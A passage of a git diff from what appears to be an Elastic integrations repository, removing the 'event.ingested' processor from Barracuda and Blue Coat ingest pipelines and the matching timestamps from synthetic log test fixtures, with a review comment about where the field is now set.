"version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418027479Z" - }, "message": "STM_WRAPPER: Initializing STM.", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418028418Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" 
@@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418029350Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index 198cbbc750f..ce09e43f41a 100644 --- a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Barracuda Web Application Firewall processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index bd21cd730d3..153fbec3830 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728249781Z" - }, "message": "ntpd[1001]: kernel time sync enabled utl", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728256159Z" - }, "message": "restorecond: : Reset file context quasiarc: liqua", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728257323Z" - }, "message": "auditd[5699]: Audit daemon rotating log files", "tags": [ "preserve_original_event" 
@@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728258427Z" - }, "message": "anacron[5066]: Normal exit ehend", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728259453Z" - }, "message": "restorecond: : Reset file context vol: luptat", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728260480Z" - }, "message": "heartbeat: : \u003c\u003ceumiu.medium\u003e Processing command: accept", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728261505Z" - }, "message": "restorecond: : Reset file context nci: ofdeFin", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728262584Z" - }, "message": "auditd[6668]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728263621Z" - }, "message": "anacron[1613]: Normal exit mvolu", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728264636Z" - }, "message": "ntpd[2959]: ntpd gelit-r tatno", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728265649Z" - }, "message": "anacron[654]: Updated timestamp for job rmagni to sit", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728266832Z" - }, "message": "dmd: : \u003c\u003ctenima.very-high\u003e Health state for metric\"seq3874.mail.domain\" \"quid\" changed to \"fug\", reason: \"success\"", "tags": [ "preserve_original_event" 
@@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728267854Z" - }, "message": "auditd[2067]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728268868Z" - }, "message": "pm[5969]: \u003c\u003ctquovol.very-high\u003e check_license_validity(), tae", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728269879Z" - }, "message": "logrotate: : ALERT exited abnormally with temUten", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728270901Z" - }, "message": "sshd: : \u003c\u003cdun.medium\u003e error: Bind to port Duisau on psum failed: failure", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728272036Z" - }, "message": "configd: : \u003c\u003cend.medium\u003e itaut@rveli: command: accept", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728273053Z" - }, "message": "authd: : \u003c\u003cluptat.low\u003e authd_signal_handler(), quam", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728274069Z" - }, "message": "xinetd[6547]: Started working: onproide available services", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728275081Z" - }, "message": "logrotate: : ALERT exited abnormally with tfug", "tags": [ "preserve_original_event" 
@@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728276095Z" - }, "message": "heartbeat: : \u003c\u003curE.medium\u003e Processing command: deny", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728277109Z" - }, "message": "rsyslogd: : Warning: rehe", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728278125Z" - }, "message": "sshd: : \u003c\u003cstiae.medium\u003e error: Bind to port erc on amqu failed: unknown", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728279251Z" - }, "message": "ntpd[4515]: ntpd emp-r aperia", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728280270Z" - }, "message": "restorecond: : Reset file context run: vol", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728281301Z" - }, "message": "logrotate: : ALERT exited abnormally with mporain", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728282378Z" - }, "message": "heartbeat: : \u003c\u003cmpori.very-high\u003e connect: atu", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728283393Z" - }, "message": "cmd: : \u003c\u003ctexp.medium\u003e cmd starting adeseru", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728284404Z" - }, "message": "cli[7108]: \u003c\u003c-uam.low\u003e tmo@::fficiade:10.2.53.125 : CLI launched", "tags": [ "preserve_original_event" 
@@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728285417Z" - }, "message": "pm[7061]: \u003c\u003cihilmo.very-high\u003e ntpd will start in tlabo", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728286428Z" - }, "message": "poller[795]: \u003c\u003coluptate.low\u003e Querying content system for job results.", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728287441Z" - }, "message": "runner[6134]: \u003c\u003cedo.very-high\u003e Processing command: allow", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728288449Z" - }, "message": "epmd: : epmd: epmd running orpor", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728289465Z" - }, "message": "runner[602]: \u003c\u003cemvel.very-high\u003e Failed to exec olup", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728290614Z" - }, "message": "shutdown[2807]: shutting down non", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728291646Z" - }, "message": "configd: : \u003c\u003cugiatnu.high\u003e sperna@sintocc: command: cancel", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728292656Z" - }, "message": "auditd[2986]: Audit daemon rotating log files", "tags": [ "preserve_original_event" 
@@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728293669Z" - }, "message": "configd: : \u003c\u003cccaecat.medium\u003e CREATE onsequ", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728294680Z" - }, "message": "auditd[1243]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728295695Z" - }, "message": "xinetd[6599]: Started working: naal available services", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728296707Z" - }, "message": "xinetd[5850]: Started working: rQu available services", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728297720Z" - }, "message": "heartbeat: : \u003c\u003cboree.low\u003e queips: undefined symbol: ncidi", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728298730Z" - }, "message": "authd: : \u003c\u003color.very-high\u003e authd_close(): npr", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728299740Z" - }, "message": "anacron[6373]: Anacron 1.3962 started on epre", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728300759Z" - }, "message": "cli[3979]: \u003c\u003c-iduntu.medium\u003e temUt@avol752.www5.test : Processing command accept", "tags": [ "preserve_original_event" 
@@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728301773Z" - }, "message": "cmd: : \u003c\u003camc.medium\u003e cmd starting isiuta", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728302854Z" - }, "message": "sshd[5227]: dutp(psaquaea:taevita): pam_putenv: ameiusm", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728303864Z" - }, "message": "ccd: : \u003c\u003colab.low\u003e Device elitse6672.internal.localdomain: mquisno", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728304874Z" - }, "message": "runner[1859]: \u003c\u003ctasnulap.high\u003e Failed to exec umSe", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728305882Z" - }, "message": "shutdown[6110]: shutting down itau", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728306991Z" - }, "message": "sshd[2415]: PAM lorsita more authentication failure; dolore", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728308006Z" - }, "message": "rsyslogd: : Warning: tio", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728309020Z" - }, "message": "cli[802]: \u003c\u003c-gnaaliqu.very-high\u003e velillu@::cteturad:10.18.204.87 : Processing a secure command...", "tags": [ "preserve_original_event" 
@@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728310051Z" - }, "message": "heartbeat: : \u003c\u003creprehe.high\u003e connect: inimveni", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728311079Z" - }, "message": "authd: : \u003c\u003clitani.low\u003e authd_close(): psumqu", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728312091Z" - }, "message": "runner[2558]: \u003c\u003cicabo.high\u003e Failed to exec edquiac", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728313111Z" - }, "message": "anacron[4538]: Updated timestamp for job remips to uisaute", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728314122Z" - }, "message": "auditd[6837]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728315142Z" - }, "message": "pm[1493]: \u003c\u003cetdolor.high\u003e print_msg(), dic", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728316161Z" - }, "message": "configd: : \u003c\u003cavolupt.low\u003e Device \"itation4168.api.domain\" completed command(s) accept ;; CPL generated by Visual Policy Manager: isciv ;rroqu ; nofd ; dipisci", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728317174Z" - }, "message": "epmd: : epmd: invalid packet size (mquae)", "tags": [ "preserve_original_event" 
@@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728318190Z" - }, "message": "runner[429]: \u003c\u003ccorpori.very-high\u003e File reading failed", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728319199Z" - }, "message": "shutdown[7595]: shutting down emqu", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728320212Z" - }, "message": "heartbeat: : \u003c\u003cleumiur.low\u003e The HB command is accept", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728321243Z" - }, "message": "authd: : \u003c\u003cest.very-high\u003e authd_signal_handler(), isetquas", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728322250Z" - }, "message": "authd: : \u003c\u003cpsaqua.medium\u003e authd_signal_handler(), gnaal", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728323319Z" - }, "message": "logrotate: : ALERT exited abnormally with voluptas", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728324333Z" - }, "message": "ntpd[627]: ntpd exiting on signal orin", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728325347Z" - }, "message": "restorecond: : Reset file context ecillu: mmodoc", "tags": [ "preserve_original_event" 
@@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728326368Z" - }, "message": "cli[1140]: \u003c\u003c-abore.high\u003e modocon@ipsu3680.mail.test : Processing command: deny", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728327419Z" - }, "message": "sshd: : bad username mquisn", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728328474Z" - }, "message": "ntpd[1313]: ntpd derit-r orese", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728329505Z" - }, "message": "ccd: : \u003c\u003cleumiur.medium\u003e Device Communication Daemon online", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728330532Z" - }, "message": "rsyslogd: : Warning: moles", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728331697Z" - }, "message": "restorecond: : Reset file context olup: aco", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728332742Z" - }, "message": "shutdown[609]: shutting down ser", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728333765Z" - }, "message": "ntpd[2991]: ntpd orinrep-r quiavol", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728334775Z" - }, "message": "dmd: : \u003c\u003cquin.medium\u003e inserted device id = sBonor2001.www5.example and serial number = amc into DB", "tags": [ "preserve_original_event" 
@@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728335819Z" - }, "message": "ccd: : \u003c\u003came.very-high\u003e ccd_handle_read_failure(), uid", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728336835Z" - }, "message": "cmd: : \u003c\u003cscivel.high\u003e cmd starting lmolesti", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728337844Z" - }, "message": "dmd: : \u003c\u003cemaperia.high\u003e inserted device id = ersp6625.internal.domain and serial number = seq into DB", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728338852Z" - }, "message": "cmd: : \u003c\u003ctanimid.medium\u003e cmd starting uipexe", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728339867Z" - }, "message": "heartbeat: : \u003c\u003core.low\u003e The HB command is cancel", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728340895Z" - }, "message": "anacron[7360]: Normal exit tperspic", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728341902Z" - }, "message": "dmd: : \u003c\u003cict.very-high\u003e Filter on (tetura) things. riosamni", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728342980Z" - }, "message": "ccd: : \u003c\u003cumetMa.low\u003e Device eleumiu2454.api.local: tat", "tags": [ "preserve_original_event" 
@@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728343991Z" - }, "message": "schedulerd: : \u003c\u003clumqu.very-high\u003e System time changed, recomputing job run times.", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728345003Z" - }, "message": "xinetd[3450]: Started working: aconsequ available services", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728346014Z" - }, "message": "authd: : \u003c\u003csequat.high\u003e handle_authd unknown message =utemvel", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728347054Z" - }, "message": "rsyslogd: : Warning: iusm", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728348065Z" - }, "message": "ntpd[16]: time reset stquido", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728349078Z" - }, "message": "ccd: : \u003c\u003caaliq.high\u003e Device olu5333.www.domain: orumSe", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728350087Z" - }, "message": "anacron[80]: Normal exit ici", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728351111Z" - }, "message": "ntpd[7612]: kernel time sync enabled nturmag", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728352127Z" - }, "message": "cli[7128]: eseruntm(lpaquiof:oloreeu): pam_putenv: olor", "tags": [ "preserve_original_event" 
@@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728353159Z" - }, "message": "schedulerd: : \u003c\u003cici.very-high\u003e Executing Job \"tquo\" execution iatnu", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728354179Z" - }, "message": "logrotate: : ALERT exited abnormally with ntut", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728355187Z" - }, "message": "poller[7151]: \u003c\u003cess.high\u003e Querying content system for job results.", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728356196Z" - }, "message": "ntpd[2314]: ntpd litanim-r rQuisaut", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728357211Z" - }, "message": "heartbeat: : \u003c\u003cmetco.high\u003e Processing command: block", "tags": [ "preserve_original_event" diff --git a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml index 939ce13fe60..fcf40dc1b13 100644 --- a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml +++ b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Blue Coat Director processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json index fbd1747776d..640dae78bfa 100644 
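Review bot: After the `@@ -2,10 +2,6 @@` hunk in the Blue Coat Director `default.yml`, nothing visible in this pipeline stamps `event.ingested`, and the expected fixtures drop the field, so the pipeline tests no longer check that it is populated. The same processor is removed in `packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml`. Presumably a pipeline that runs after this one (Fleet's final pipeline) now supplies the field; if so, record that where the processor used to be, e.g. `# event.ingested is set by the Fleet final pipeline, not here`, and confirm the package's minimum stack version guarantees that pipeline exists. Detection rules and ingest-delay checks that key on `event.ingested` would otherwise silently miss these events wherever the pipeline runs without it. The rest of both pipelines lies outside the hunks.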
--- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json @@ -22,7 +22,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120890521Z", "kind": "event", "type": [ "info" @@ -61,7 +60,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120892622Z", "kind": "event", "type": [ "info" @@ -98,7 +96,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120893573Z", "kind": "event", "type": [ "info" @@ -137,7 +134,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120894349Z", "kind": "event", "type": [ "info" @@ -176,7 +172,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120895100Z", "kind": "event", "type": [ "info" @@ -213,7 +208,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120895848Z", "kind": "event", "type": [ "info" @@ -252,7 +246,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120896593Z", "kind": "event", "type": [ "info" @@ -291,7 +284,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120897339Z", "kind": "event", "type": [ "info" @@ -330,7 +322,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120898068Z", "kind": "event", "type": [ "info" @@ -374,7 +365,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120898801Z", "kind": "event" }, "host": { @@ -445,7 +435,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120899541Z", "kind": "event", "type": [ "info" @@ -488,7 +477,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120900456Z", "kind": "event", "type": [ "info" @@ -546,7 +534,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120901222Z", "kind": "event" }, "file": { @@ -610,7 +597,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120901965Z", "kind": "event", "type": [ "info" 
@@ -651,7 +637,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120902705Z", "kind": "event" }, "observer": { @@ -687,7 +672,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120903445Z", "kind": "event", "type": [ "info" @@ -722,7 +706,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120904295Z", "kind": "event" }, "host": { @@ -772,7 +755,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120905032Z", "kind": "event", "type": [ "info" @@ -813,7 +795,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120905768Z", "kind": "event" }, "observer": { @@ -849,7 +830,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120906498Z", "kind": "event", "type": [ "info" @@ -899,7 +879,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120907242Z", "kind": "event", "type": [ "connection", @@ -935,7 +914,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120907985Z", "kind": "event" }, "host": { @@ -983,7 +961,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120908738Z", "kind": "event", "type": [ "info" @@ -1024,7 +1001,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120909579Z", "kind": "event" }, "observer": { @@ -1060,7 +1036,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120910328Z", "kind": "event", "type": [ "info" @@ -1111,7 +1086,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120911068Z", "kind": 